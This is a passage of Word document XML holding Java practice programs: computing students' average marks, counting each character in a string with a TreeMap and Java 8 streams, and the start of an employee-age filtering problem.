    <w:p w14:paraId="18C6CA58"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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> getAverageMark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D4D5FE6"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averageMarks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C64AA6F"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CEB40C8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68213E67"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oString method for easy display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E63D819"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37661964"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to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2E8D0CA"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Student{i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nam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mark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ark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averageMark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verageMark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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189ECFD2"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F975720"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF62412"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD277EA"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verageMarksCalculat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14F40BF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873B93A"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A95B7BF"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ample students with marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6CD69"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udent</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student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p>
    <w:p w14:paraId="0BF329BD"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uden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Joh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8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9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85</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A94DD0E"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uden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Jan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7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8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70</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF107B4"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uden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Bo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9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9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00</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C13EE9"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uden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4</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li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6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6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70</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68974529"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E4531E7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F983600"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int students with their average marks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C51A0"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udent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> stude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uden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9B446BC"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udent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A6B71"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EC8C364" w14:textId="77777777"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36180C4" w14:textId="1065B251" w:rsidR="00CF2E5C" w:rsidRPr="00CE4B95"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7BBCC807" w14:textId="77777777" w:rsidR="00CF2E5C" w:rsidRPr="00CE4B95" w:rsidRDefault="00CF2E5C" w:rsidP="00365A15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4331FD9D" w14:textId="77777777" w:rsidR="00CF2E5C" w:rsidRPr="00CE4B95" w:rsidRDefault="00CF2E5C" w:rsidP="00365A15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A94EB00" w14:textId="3E3FF313" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="349" w:name="_Toc196307829"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Count of each Character in a String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="349"/>
    </w:p>
    <w:p w14:paraId="19AAC21D" w14:textId="4BBC7560" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A545A61"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p>
    <w:p w14:paraId="211C0605"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FABEE"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TreeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1913B98E"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functio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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C24C3D"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ollectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF376DB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3323A054"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA7826"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @author Siddhant Patni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A704E82"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118078B8"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hracterCou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8A3D3C2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560652AC" w14:textId="3867C558"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findCharacterCoun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in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B9E769C"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Charac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charCount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reeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&l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hanged to TreeMap for sorted output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19392E9E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE251C"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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c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n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CharArr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6A2887A"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harac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LetterOrDigi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45A79FA"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xml:space="preserve">                    c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harac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LowerCas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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E063480"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xml:space="preserve">                    charCoun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harCoun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OrDefaul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7F18F3AE"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B494AAD"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5C2C16A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82CF01"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Character Occurrences (Basic Approach):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C4EDA"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xml:space="preserve">            charCoun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orEac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v</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k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g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v</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E79D3D7"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2C0C65B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18867670"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findCharacterCountUsingStream</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in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97A774F"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Charac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o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charFrequenc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n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LowerCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3FFC9F"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hars</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB4165"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pTo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c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cha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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17988D2C"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ilter</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harac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LetterOrDigit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526C7D6B"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llec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ollecto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roupingBy</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Func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dentit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reeMap</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ollecto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unting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271440B3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02C9CD"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Character Occurrence (Java 8 Stream):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39048ED8"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xml:space="preserve">            charFrequenc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orEac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v</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k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g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v</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE8D858"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5C0AD0B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBB4941"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AF5F651"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inpu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This is Java development"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F741A4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009DFD9C" w14:textId="459DEB3C" w:rsidR="00E556C7" w:rsidRPr="00CE4B95" w:rsidRDefault="00161C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00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Input: "</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4816F2A8" w14:textId="77777777"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3367FE96" w14:textId="07DBA84B" w:rsidR="00E556C7" w:rsidRPr="00CE4B95" w:rsidRDefault="00161C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00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>findCharacterCount</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379E807B" w14:textId="033A0C9E" w:rsidR="00E556C7" w:rsidRPr="00CE4B95" w:rsidRDefault="00161C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00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>findCharacterCountUsingStream</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>input</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E556C7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2C655" w14:textId="3570AAE9"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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574642CA" w14:textId="0A4686A5" w:rsidR="00E556C7" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D091C8" w14:textId="77777777" w:rsidR="00E556C7" w:rsidRPr="00CE4B95" w:rsidRDefault="00E556C7" w:rsidP="00E556C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E58004" w14:textId="39728FCF" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="350" w:name="_Toc196307830"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="003A1922" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Find Employee with age greater than 15</w:t>
      </w:r>
      <w:bookmarkEnd w:id="350"/>
    </w:p>
    <w:p w14:paraId="77466AA4" w14:textId="77777777" w:rsidR="00CE749B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00CE749B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00CE749B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a java 8 code to get the age greater than 15 from the Employee object?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637613D5" w14:textId="77777777" w:rsidR="00CE749B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE749B" w:rsidP="00CE749B">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input - Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E3AEC4" w14:textId="77777777" w:rsidR="00CE749B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE749B" w:rsidP="00D8438E">
      <w:pPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B46D9F" w14:textId="77777777" w:rsidR="00CE749B" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE749B" w:rsidP="00D8438E">
      <w:pPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
